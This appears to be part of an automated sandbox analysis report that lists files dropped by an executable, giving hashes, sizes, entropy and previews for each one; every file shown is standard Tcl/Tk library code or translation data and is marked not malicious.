                                                                                                                                                                                                                                            Preview:This software is copyrighted by the Regents of the University of..California, Sun Microsystems, Inc., Scriptics Corporation, ActiveState..Corporation, Apple Inc. and other parties. The following terms apply to..all files associated with the software unless explicitly disclaimed in..individual files.....The authors hereby grant permission to use, copy, modify, distribute,..and license this software and its documentation for any purpose, provided..that existing copyright notices are retained in all copies and that this..notice is included verbatim in any distributions. No written agreement,..license, or royalty fee is required for any of the authorized uses...Modifications to this software may be copyrighted by their authors..and need not follow the licensing terms described here, provided that..the new terms are clearly indicated on the first page of each file where..they apply.....IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY..FOR DIRECT, INDIRECT, SPECIAL, INCI
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15255
                                                                                                                                                                                                                                            Entropy (8bit):4.9510475386072095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:apDYV5Yupn5OcckwBv3HCpg2J8JvJBfWeZhXkz+WkHGowv:aPPkevB2JuvJ9D3XmSc
                                                                                                                                                                                                                                            MD5:804E6DCE549B2E541986C0CE9E75E2D1
                                                                                                                                                                                                                                            SHA1:C44EE09421F127CF7F4070A9508F22709D06D043
                                                                                                                                                                                                                                            SHA-256:47C75F9F8348BF8F2C086C57B97B73741218100CA38D10B8ABDF2051C95B9801
                                                                                                                                                                                                                                            SHA-512:029426C4F659848772E6BB1D8182EB03D2B43ADF68FCFCC1EA1C2CC7C883685DEDA3FFFDA7E071912B9BDA616AD7AF2E1CB48CE359700C1A22E1E53E81CAE34B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# listbox.tcl --..#..# This file defines the default bindings for Tk listbox widgets..# and provides procedures that help in implementing those bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....#--------------------------------------------------------------------------..# tk::Priv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# listboxPrev -.The last element to be selected or deselected..#...during a selection operation...# listboxSelection -.All of the items that were selected before the..#...current selection operation (such as a mouse..#...drag) started; used to cancel an operation...#--------------------------------------------------------------------------....#--------------
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9862
                                                                                                                                                                                                                                            Entropy (8bit):4.786615174847384
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mvEEVwjVwqOpOLbkVAg/vyKEZ25YbKZbwrmQ:mvEEVwJwpALPgnyx25YGZkr3
                                                                                                                                                                                                                                            MD5:D83ED6AC2912900040530528A0237AB3
                                                                                                                                                                                                                                            SHA1:2D18E42A8B96C3D71C1C6701010FDF75C1E6D5D8
                                                                                                                                                                                                                                            SHA-256:848258B946C002E2696CA3815A1589C8120AF5CC41FBC11BBD9A3F5754CC21AF
                                                                                                                                                                                                                                            SHA-512:00B4CD0D58029FC37820C163A4AE1DEAD22FB5C767BDC118659EACE26D449C362189611DFB3FAB1AC129FABFEC2CE853EA2C10D418FAE5AEB91DDC9330FF782D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# megawidget.tcl..#..#.Basic megawidget support classes. Experimental for any use other than..#.the ::tk::IconList megawdget, which is itself only designed for use in..#.the Unix file dialogs...#..# Copyright (c) 2009-2010 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....package require Tk.....::oo::class create ::tk::Megawidget {.. superclass ::oo::class.. method unknown {w args} {...if {[string match .* $w]} {... [self] create $w {*}$args... return $w...}...next $w {*}$args.. }.. unexport new unknown.. self method create {name superclasses body} {...next $name [list \....superclass ::tk::MegawidgetClass {*}$superclasses]\;$body.. }..}....::oo::class create ::tk::MegawidgetClass {.. variable w hull options IdleCallbacks.. constructor args {...# Extract the "widget name" from the object name...set w [namespace tail [self]].....# Configure things...
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39790
                                                                                                                                                                                                                                            Entropy (8bit):4.915612301723047
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NKJsO8O4IzOQjJwxzire5pKVjriecYyq4CpKgnP:NKJsO8iOQizire54lriecYf40
                                                                                                                                                                                                                                            MD5:B7DAA21C1C192B8CB5B86CBD7B2CE068
                                                                                                                                                                                                                                            SHA1:AE8ABF9017F37CCDF5D0D15DE66BB124A7482BA0
                                                                                                                                                                                                                                            SHA-256:312AF944A276CDBF1EE00757EF141595670984F7F13E19922C25643A040F5339
                                                                                                                                                                                                                                            SHA-512:B619E3B8BE5EC4545E97B7A7A7F7FECC2AAFA58438F9CA3819F644720CF5FF5C44DA12AC25988570E595D97CAD799F87D93C24D5E67A7A953B9F5312952FBEB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# menu.tcl --..#..# This file defines the default bindings for Tk menus and menubuttons...# It also implements keyboard traversal of menus and implements a few..# other utility procedures related to menus...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# cursor -..Saves the -cursor option for the posted menubutton...# focus -..Saves the focus during a menu selection operation...#...Focus gets restored here when the menu is unposted...# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if..#...tk::Priv(oldGrab) is non
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):30840
                                                                                                                                                                                                                                            Entropy (8bit):5.142909056222569
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:+c4g8rSnBGzHsGK83Ch0x/0kmSq6O4+rNfPCpM2sEmqKys3pCJxi5dEaY:+c4g8OnBGzBK83Ch0x/0FSq6OnrGM2h3
                                                                                                                                                                                                                                            MD5:983C7B78F1A0EBACAB8006D391A01FCD
                                                                                                                                                                                                                                            SHA1:7EA37474EA039ED7A37BFDD7D76EAE673E666283
                                                                                                                                                                                                                                            SHA-256:C5BDCA3ABA671F03DC4624AB5FD260490F5002491D6C619142CCF5A1A744528A
                                                                                                                                                                                                                                            SHA-512:A006EF9B7213E572F6FC540D1512A52C52FEC44E3A07846DE09662AE32B7191C5CF639798531847B39E4076BF9DD6314B6F5373065C04F4FEF221185B39C3117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# mkpsenc.tcl --..#..# This file generates the postscript prolog used by Tk.....namespace eval ::tk {.. # Creates Postscript encoding vector for ISO-8859-1 (could theoretically.. # handle any 8-bit encoding, but Tk never generates characters outside.. # ASCII)... #.. proc CreatePostscriptEncoding {} {...variable psglyphs...# Now check for known. Even if it is known, it can be other than we...# need. GhostScript seems to be happy with such approach...set result "\[\n"...for {set i 0} {$i<256} {incr i 8} {... for {set j 0} {$j<8} {incr j} {....set enc [encoding convertfrom "iso8859-1" \.....[format %c [expr {$i+$j}]]]....catch {.... set hexcode {}.... set hexcode [format %04X [scan $enc %c]]....}....if {[info exists psglyphs($hexcode)]} {.... append result "/$psglyphs($hexcode)"....} else {.... append result "/space"....}... }... append result "\n"...}...append result "\]"...return $result.. }.... # List of adobe glyph names. Converted from glyph
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16786
                                                                                                                                                                                                                                            Entropy (8bit):4.717927930017041
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:+haZOxBpK8uxGe4V88/wxY3Fxqipz4zz4zxxFzxT4OcErDxqdRRZeuC/Vj2CoopC:+hRWRG3FFjvsfCoopwITHzLHFHHAABs
                                                                                                                                                                                                                                            MD5:217087AB6B2A8F9D7252E311D69C3769
                                                                                                                                                                                                                                            SHA1:09AEB2BC5B7C7F4AB3DE4211D786C519AE0970F6
                                                                                                                                                                                                                                            SHA-256:A07E3A3809CED3C6C9C1E171DCA5AD1F28357734CD41B2B9DD9F58085B3D2842
                                                                                                                                                                                                                                            SHA-512:6E57633C924BFC16D380C014C20DD24D5727E70D4843FCEC4D7995B4DB21941EA8F2A5FD6E5386DF3364B6905D4D66B2B9595DC8FC70CFF40A2D49A92A1B6FBA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# msgbox.tcl --..#..#.Implements messageboxes for platforms that do not have native..#.messagebox support...#..# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# Ensure existence of ::tk::dialog namespace..#..namespace eval ::tk::dialog {}....image create bitmap ::tk::dialog::b1 -foreground black \..-data "#define b1_width 32\n#define b1_height 32..static unsigned char q1_bits[] = {.. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,.. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,.. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x04, 0x00,
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4235
                                                                                                                                                                                                                                            Entropy (8bit):4.789130604359491
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nlw9Twd+j3gLhokqwX+hTnJgNanPNcgRhgP+5QPwJJENL:nlw9TjjwI3hTnJgNaRhgP75L
                                                                                                                                                                                                                                            MD5:5A8B46B85DCCBF74E2B5B820E1A7B9D1
                                                                                                                                                                                                                                            SHA1:980F4FC5BABA82BA0FE02F9BD03A23DF6D565BB1
                                                                                                                                                                                                                                            SHA-256:4DFFBEEDBF0D66D84B13088016D1A782CEAAD4DED27BE1E38842F8969C0E533F
                                                                                                                                                                                                                                            SHA-512:2D81FC06CF3C20E4F6314BD13AF81FDE38A9B06510584C84C6A0C8C36314F980F77D02BD8056E7EE5DE599A0620E0C0349124147334B9C141145270046B19D90
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it".. ::msgcat::mcset cs "&About..." "&O programu...".. ::msgcat::mcset cs "All Files" "V\u0161echny soubory".. ::msgcat::mcset cs "Application Error" "Chyba programu".. ::msgcat::mcset cs "Bold Italic".. ::msgcat::mcset cs "&Blue" "&Modr\341".. ::msgcat::mcset cs "Cancel" "Zru\u0161it".. ::msgcat::mcset cs "&Cancel" "&Zru\u0161it".. ::msgcat::mcset cs "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nemohu zm\u011bnit atku\341ln\355 adres\341\u0159 na \"%1\$s\".\nP\u0159\355stup odm\355tnut.".. ::msgcat::mcset cs "Choose Directory" "V\375b\u011br adres\341\u0159e".. ::msgcat::mcset cs "Cl&ear" "Sma&zat".. ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu".. ::msgcat::mcset cs "Color" "Barva".. ::msgcat::mcset cs "Console" "Konzole".. ::msgcat::mcset cs "&Copy" "&Kop\355rovat".. ::msgcat::mcset cs "Cu&t" "V&y\u0159\355znout".. ::msgcat::mcset cs "&
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3987
                                                                                                                                                                                                                                            Entropy (8bit):4.651948695787255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nRZ2uDMr05sIEzs2KkrT+XuTKN0FjDDP9:nRZzDy4kBKkrT+QpP9
                                                                                                                                                                                                                                            MD5:227B0F255F854460E8E5146ED7A17B85
                                                                                                                                                                                                                                            SHA1:99A080CAD631F21963C51A5B254BDAD3724DC866
                                                                                                                                                                                                                                            SHA-256:FEEF8F8AD33BB3362C845A25D6ED273C398051047D899B31790474614C7AFD2D
                                                                                                                                                                                                                                            SHA-512:36A4B48831316CC29686CC76DA00110EB078EC56F55A960D11AE427AA3D913C340C1E3805BF2AD40C1A8A92FC6587DA5D2C245E7501289FC3E228BE14FE49598
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset da "&Abort" "&Afbryd".. ::msgcat::mcset da "&About..." "&Om...".. ::msgcat::mcset da "All Files" "Alle filer".. ::msgcat::mcset da "Application Error" "Programfejl".. ::msgcat::mcset da "&Blue" "&Bl\u00E5".. ::msgcat::mcset da "Cancel" "Annuller".. ::msgcat::mcset da "&Cancel" "&Annuller".. ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.".. ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog".. ::msgcat::mcset da "Cl&ear" "&Ryd".. ::msgcat::mcset da "&Clear Console" "&Ryd konsolen".. ::msgcat::mcset da "Color" "Farve".. ::msgcat::mcset da "Console" "Konsol".. ::msgcat::mcset da "&Copy" "&Kopier".. ::msgcat::mcset da "Cu&t" "Kli&p".. ::msgcat::mcset da "&Delete" "&Slet".. ::msgcat::mcset da "Details >>" "Detailer".. ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" finde
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4914
                                                                                                                                                                                                                                            Entropy (8bit):4.6221938909259475
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nxLEpatioUqGBLbz4ME/XKKVN9R7S/0oYr9:epY3MkXKKxRu2r9
                                                                                                                                                                                                                                            MD5:2203F65BCDA61BC15AEAC4F868C6D94A
                                                                                                                                                                                                                                            SHA1:C4CC3975679D23892406E4E8971359A0775B1B86
                                                                                                                                                                                                                                            SHA-256:C0F574B14068A049E93421C73873D750C98DE28B7B77AA42FE72CBE0270A4186
                                                                                                                                                                                                                                            SHA-512:79F134FDAD3B12524D43BF9F59D3C04CAE30A95F591A51B82C8DF7CC8563BEA5D464AEECC457D9F60C04365E30459C447ED537AFC832BA25E1815DE06C2B81E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset de "&Abort" "&Abbruch".. ::msgcat::mcset de "&About..." "&\u00dcber...".. ::msgcat::mcset de "All Files" "Alle Dateien".. ::msgcat::mcset de "Application Error" "Applikationsfehler".. ::msgcat::mcset de "&Apply" "&Anwenden".. ::msgcat::mcset de "Bold" "Fett".. ::msgcat::mcset de "Bold Italic" "Fett kursiv".. ::msgcat::mcset de "&Blue" "&Blau".. ::msgcat::mcset de "Cancel" "Abbruch".. ::msgcat::mcset de "&Cancel" "&Abbruch".. ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.".. ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis".. ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen".. ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen".. ::msgcat::mcset de "Color" "Farbe".. ::msgcat::mcset de "Console" "Konsole".. ::msgcat::mcset de "&Copy" "&Kopieren".. ::msgcat::mcset de "
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (355), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8784
                                                                                                                                                                                                                                            Entropy (8bit):4.334043617395095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:tVj/F+oxBHbkI8+xTqFt2zPJ0k63fRGIUvPXrfBNnzc+zIF7meUOT7GC8MO07S0g:fj9+AHlLoozHn7fBFrMVmehCAGb
                                                                                                                                                                                                                                            MD5:780F863903BBDAA6C371EC0D3C7E6D59
                                                                                                                                                                                                                                            SHA1:DF5D435E132BEE4C076A7FC577C8C275A8B68CD5
                                                                                                                                                                                                                                            SHA-256:3F6F155864FE59A341BFD869735E54DD21CEE21BBD038433D9B271AD77BA3F7E
                                                                                                                                                                                                                                            SHA-512:091965EE912513AE1943BE840A2E757188FBA6F760F7C47BE80D06313D59B051F183E3A29D4B1CEDE1F9E54CA3CA23D75FF2C3A3672A4E71FB56F0FA76F7FA0D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:## Messages for the Greek (Hellenic - "el") language...## Please report any changes/suggestions to:..## petasis@iit.demokritos.gr....namespace eval ::tk {.. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2".. ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...".. ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1".. ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2".. ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5".. ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7".. ::msgcat::mcset el \.."Cannot change to the directory \"%1\$s\".\nPermission denied." \.."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3377
                                                                                                                                                                                                                                            Entropy (8bit):4.279601088621442
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:sQ7dw5bO0V3gqmCNyoKJ6iwp/uvENv4SKEcET2hsHFjr:n7dwNOc3RmOKJQcvEl4SK1ET2hYFjr
                                                                                                                                                                                                                                            MD5:D48CFC9EC779085E8F6AAA7B1C40C89A
                                                                                                                                                                                                                                            SHA1:0CF6253BFF39F40CA0991F9B06D3394BFEA21ED2
                                                                                                                                                                                                                                            SHA-256:4A33B44B2E220E28EAAE7FAC407CAFE43D97C270DA58FA5F3B699A1760BFB2A4
                                                                                                                                                                                                                                            SHA-512:C00EC0CFB48ABE621EF625C51952BCF177CE3BC7F0DEC5276EF84C9A97C7E014806B106EA8DEE202C43F8DD54ED7261A8D899E3EE12E3F37A90C387D864463AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset en "&Abort".. ::msgcat::mcset en "&About...".. ::msgcat::mcset en "All Files".. ::msgcat::mcset en "Application Error".. ::msgcat::mcset en "&Apply".. ::msgcat::mcset en "Bold".. ::msgcat::mcset en "Bold Italic".. ::msgcat::mcset en "&Blue".. ::msgcat::mcset en "Cancel".. ::msgcat::mcset en "&Cancel".. ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.".. ::msgcat::mcset en "Choose Directory".. ::msgcat::mcset en "Cl&ear".. ::msgcat::mcset en "&Clear Console".. ::msgcat::mcset en "Color".. ::msgcat::mcset en "Console".. ::msgcat::mcset en "&Copy".. ::msgcat::mcset en "Cu&t".. ::msgcat::mcset en "&Delete".. ::msgcat::mcset en "Details >>".. ::msgcat::mcset en "Directory \"%1\$s\" does not exist.".. ::msgcat::mcset en "&Directory:".. ::msgcat::mcset en "&Edit".. ::msgcat::mcset en "Effects".. ::msgcat::mcset en "Error: %1\$s".. ::msgcat::mcs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                            Entropy (8bit):4.262228832346611
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:fEGp6fRyv//mGoW8vMKEQXyVn:sooyv//xoQOOn
                                                                                                                                                                                                                                            MD5:3D41FC47CD9936F817EF9645D73A77ED
                                                                                                                                                                                                                                            SHA1:E62BBE094B71CAF4A389DE3ECD84D2EEFBA33827
                                                                                                                                                                                                                                            SHA-256:01238293356E82F1D298896491F8B299BB7DC9C34F299C9E756254C736DA612B
                                                                                                                                                                                                                                            SHA-512:B92582C32C4D7CD9DE6571CBB6B93DD693A8B5A80645468E2D02B80C339BE2B95D5B4878A0DA9AFFE9E2F98A6C38AAE9CC1FF2440146D0ED128FE8C9A92EECDB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset en_gb Color Colour..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4035
                                                                                                                                                                                                                                            Entropy (8bit):4.614759526381991
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:n6oXunu4/LQmI+nl0WemQ+uISIKk/2nibN5My/uXcFSZHBohy:n6oXuu4jJtlPemVuISIKkuniJS1Gy
                                                                                                                                                                                                                                            MD5:3704A08985B0AA3C521FDF9C2DA59D97
                                                                                                                                                                                                                                            SHA1:3F1E42C5697504B4DEE1EE314CD361B4203BF686
                                                                                                                                                                                                                                            SHA-256:84B117857674A2426290946053A61316C5C8C6808F2C6EDF0ECC5C4A9C5C72AC
                                                                                                                                                                                                                                            SHA-512:99FE97B10B1CA59DDA0385161E7C05F7D22424B6B1FB844138921EF94B2E9809D73EBC0062897D0DDE040CF92C96A6E4916CC9F3F02442AE2C4162858434B6BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset eo "&Abort" "&\u0108esigu".. ::msgcat::mcset eo "&About..." "Pri...".. ::msgcat::mcset eo "All Files" "\u0108iuj dosieroj".. ::msgcat::mcset eo "Application Error" "Aplikoeraro".. ::msgcat::mcset eo "&Blue" "&Blua".. ::msgcat::mcset eo "Cancel" "Rezignu".. ::msgcat::mcset eo "&Cancel" "&Rezignu".. ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u015dan\u011di al dosierujo \"%1\$s\".\nVi ne rajtas tion.".. ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujon".. ::msgcat::mcset eo "Cl&ear" "&Vakigu".. ::msgcat::mcset eo "&Clear Console" "&Vakigu konzolon".. ::msgcat::mcset eo "Color" "Koloro".. ::msgcat::mcset eo "Console" "Konzolo".. ::msgcat::mcset eo "&Copy" "&Kopiu".. ::msgcat::mcset eo "Cu&t" "&Eltondu".. ::msgcat::mcset eo "&Delete" "&Forigu".. ::msgcat::mcset eo "Details >>" "Detaloj >>".. ::msgcat::mcset eo "Directory \"%1\$s\" does not exi
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4024
                                                                                                                                                                                                                                            Entropy (8bit):4.536517819515934
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nN0T1Lt8ZYSih/aiik148aFscyTzoixccUTqjcg60Dx/H5:nN0BLSQUXy/o8re055
                                                                                                                                                                                                                                            MD5:4765F3C055742530E4644771EBC6C69F
                                                                                                                                                                                                                                            SHA1:8BEA722AC00522DEAA5B380AEEF4CA57D7A271BD
                                                                                                                                                                                                                                            SHA-256:D2842B80F1B521EFF2D2656A69274B5F2A8F4F5831AF2E8EE73E3C37389F981F
                                                                                                                                                                                                                                            SHA-512:9CA247F22797A1A1FCA42B5CDABF58262ED95EECDDD321CEB1440A60A4375923E0F511238F360D159EB5EED6F82CBBE0B8907A07CC77DB831BF97082932CD0FD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset es "&Abort" "&Abortar".. ::msgcat::mcset es "&About..." "&Acerca de ...".. ::msgcat::mcset es "All Files" "Todos los archivos".. ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n".. ::msgcat::mcset es "&Blue" "&Azul".. ::msgcat::mcset es "Cancel" "Cancelar".. ::msgcat::mcset es "&Cancel" "&Cancelar".. ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.".. ::msgcat::mcset es "Choose Directory" "Elegir directorio".. ::msgcat::mcset es "Cl&ear" "&Borrar".. ::msgcat::mcset es "&Clear Console" "&Borrar consola".. ::msgcat::mcset es "Color".. ::msgcat::mcset es "Console" "Consola".. ::msgcat::mcset es "&Copy" "&Copiar".. ::msgcat::mcset es "Cu&t" "Cor&tar".. ::msgcat::mcset es "&Delete" "&Borrar".. ::msgcat::mcset es "Details >>" "Detalles >>".. ::msgcat::mcset es "Directory \"%1\$s\"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4693
                                                                                                                                                                                                                                            Entropy (8bit):4.640083757706223
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:najdLGoC0TXwqTwPRNQXfdHzAIX169ZZv6CpvgIPJupuupw6kWVVxn6/9Yv:nWdLGo2WiMn4t5pvbxuPtx6F6
                                                                                                                                                                                                                                            MD5:BD795A1D95446BEE7AEB16FB6E346271
                                                                                                                                                                                                                                            SHA1:38469DBD386C35B90EBE0A0FE2CE9F1AB5A5444A
                                                                                                                                                                                                                                            SHA-256:893BEDCDAED4602898D988E6248B8BB0857DD66C06194B45F31340CA03D82369
                                                                                                                                                                                                                                            SHA-512:B9BDDECB1DE2025C6C4027BF6228A14D5F573F5859ED3444298809266F06E6203F72004D589314C6529A2E198039355B4FD6160F87DA8F97B55E9F841B6C3F5A
                                                                                                                                                                                                                                            Malicious:false
